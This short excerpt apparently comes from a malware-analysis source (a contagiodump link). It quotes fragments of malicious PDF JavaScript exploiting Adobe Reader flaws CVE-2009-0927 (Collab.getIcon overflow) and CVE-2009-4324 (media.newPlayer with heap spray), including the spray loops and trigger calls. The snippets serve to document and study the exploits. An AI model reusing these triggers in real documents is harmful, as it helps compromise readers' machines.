i ++ ){ buffer[i] = unescape("%0a%0a%0a%0a"); } var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');"; eval(strtmp3);
CVE-2009-0927 - Collab.getIcon() [stack-based buffer overflow]
for (i = 0; i < 200; i ++ )memory[i] = block + shellcode; try { this .media.newPlayer(null); } catch (e){} util.printd(String.fromCharCode(2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 257 , 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570), new Date()); }
CVE-2009-4324 - media.newPlayer() [with heap spray]
http://contagiodump.blogspot.com/2010/08/aug-3-cve-2009-0927-cve-2009-4324-cve.html